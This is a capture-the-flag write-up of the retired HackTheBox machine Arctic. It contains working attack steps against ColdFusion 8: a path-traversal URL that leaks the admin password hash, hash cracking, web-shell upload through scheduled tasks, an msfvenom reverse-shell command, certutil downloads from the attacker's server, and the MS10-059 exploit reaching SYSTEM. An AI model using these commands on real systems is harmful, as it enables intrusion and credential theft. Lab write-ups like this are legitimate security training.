HackTheBox - Retired - Arctic - Updated

Hackthebox - Retired - arctic

Recon

I've been using Threader3000 for my recon scan lately. It's written in python and does a really quick up/down scan on all TCP. Then it will run an nmap scan based on the initial results. It saves all the outputs automatically.

I like to convert the xml of the nmap scan to HTML to make it pretty.

Just 3 ports 135, 8500 and 49154

135 and 49154 are probably RPC I tried enum4linux to see if we got any info back as anonymous user

So what is port 8500? Nmap says its fmtp never heard of it.

When I see a port I don't know about I usually try to netcat to it like it as a telnet session or use curl or a web browser just to see if anything shows up.

Netcat was nothing…..  But

There was a response in curl

Let's try firefox.

What is CFIDE?

A quick google search found

https://www.petefreitag.com/item/750.cfm

Which says it might be a coldfusion. I tried to admin url in the web post.

http://arctic.htb:8500/CFIDE/administrator/index.cfm

Looks like this is cold fusion… but what is cold fusion?

Exploit

Googling around for cold fusion 8 exploit I found this LFI on this blog

https://ultimatepeter.com/tutorial-coldfusion-exploit-hack-big-sites-with-ease/

If we go  to this path it should give us the hash for the admin password.

http://arctic.htb:8500/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00e%E2%80%8Bn

password=2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03

Hashid says this could be a sha-1

Let's throw it at hashcat and see if we can get this plaintext password. The one thing that I always have to look at is the mode for hashcat. I can never remember off the top of my head what the mode number is for all these different types of hashes.

So we can do 

hashcat --help to list them out.

I saved the hash in a file name hash on my kali box.

hashcat -m 100 ./hash /usr/share/wordlists/rockyou.txt --outfile ./cracked.txt

I like to save out hashcat results to a file to keep records and it's easier than remembering how to access cracked hashes in hashcat :)

It says it was able to crack it. Let's check the cracked file to see what it is.

The admin password is happyday

Let's try to login with it

Ok now what can we do in here?

When I get stuck I like to google the name of the service I'm trying to leverage and pentest. There are lots of great resources out there from people who have tackled these services before that can usually give you a path forward.

In doing that process this time I found this site.

https://pentest.tonyng.net/attacking-adobe-coldfusion/

Here they talk about using the scheduled task to upload a mailuous cfml file to the server using a web server we control and running it as a scheduled task. Seems pretty straightforward and easy, they even give you an example web shell to use. 

I made a copy of the webshell on my kali box and named it shell.cfml

Now we will just use a newer tool than python's SimpleHTTPServer, it's called Updog and can installed using pip3

Pip3 install updog

Then we just start it from the directory we stored our web shell in.

updog

It starts on port 9090

Now we just need to create a scheduled task that will download the malicious file from us so we can get command execution.

Well start by choosing Scheduled tasks, then Schedule New Task

The dates and time look weird on this box so just ignore them we can run this on demand after we get it created.

I followed along with the blog and got an error

It's saying C:\inetpub\wwwroot doesn't exist.

Well that kind of makes sense, we didn't see IIS on port 80 so that directory probably doesn't exist.

So now we need to find what the installation directory for coldfusion 8 is, luckily that was just a google search away.

From the Adobe installation guide.

C:\coldfusion8\wwwroot

And the admin page is in \CFIDE\

So let's put it in there since we should have access to it.

C:\coldfusion8\wwwroot\CFIDE\shell.cfml

No errors that time

We can see our task now

Now green icon to run our script, which will hopefully move our webshell to a location we can get to it.

Let's see if we can get to our shell.cfml file

So the CFIDE directory is browsable so its easy to see if we the shell.

But we get an error when we try to run it

Crap, well this is part of the process. I leave these fails in my write ups sometimes just as a reminder that not everything we try is going to work. We might try 100 iterations of something before we can get it to fire correctly and that is just all part of the process. 

Eventually I found a cold fusion shell that works…. Most of the notes are in russian sooooooo..

https://github.com/Pashkela/Cfm_Shell_v3.0_edition/blob/master/README.md

Used the scheduled tasks to upload it to coldfusion.. There is a login page if you use this shell

Username: root

Password: ololo

This looks like a pretty solid web shell, we can get directories, upload files, download files, run commands and looks like we can get to sql all straight from this web shell.

Well… Good News and Bad news.

Good news, can can get in a user named tolis's home folder and get user.txt straight from the shell.

Bad News… Cmd Execution isn't working 

Ok well technically it looks like it may work, it might just be the output of the commands that's not working given the error.

I think the commands are still executing, we just aren't getting the output of the commands.

Next I tried 

Mkdir C:\temp\circusmonkey

Then I browsed to the location to see if it created the directory.

Nope.. ok fine I give up on cold fusion shells

We should be able to use a java reverse shell here to get a foothold on the box.

First we need to generate a jsp file using msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.19 LPORT=55555 -f raw > shell.jsp

Now we just edit our scheduled task to be shell.jsp

Setup our listener in Kali

nc -lnvp 55555

Now it shows in the directory (plus all of our other attempts)

If we click on shell.jsp we will hopefully get a shell back on our netcat listener.

And we do ( thankfully)

Ok so now we have a shell as the user tolis we can read the user.txt file from their Desktop directory

Cool now we just need to find our path to administrator…

I used my updog server to download a copy of winpeas.bat onto arctic

And used certutil to download it to arctic

certutil.exe -urlcache -f http://10.10.14.19:9090/winPEAS.bat winPEAS.bat

Winpeas shows a bunch of unpatched vulns that we might be able to use to escalate our privilege here.

Well I'm familiar with MS10-59 ChimiChurri and I already have the exploit downloaded to my kali box. But if you don't you can find it here.

https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled

Now I just copy into the same folder I'm running updog from.

Then use certutil.exe to download the file to arctic.

certutil.exe -urlcache -f http://10.10.14.19:9090/Chimichurri.exe Chimi.exe

This Exploit creates a reverse shell as System so we need to setup another listener, and tell the exploit where to send the reverse shell.

Our new listener.

nc -lnvp 5555

Then on Arctic we run the exploit using.

C:\temp\Circusmonkey\Chimi.exe 10.10.14.19 5555

Now if we check our new listener..

We do have a shell as system. We should be able to get the root flag now.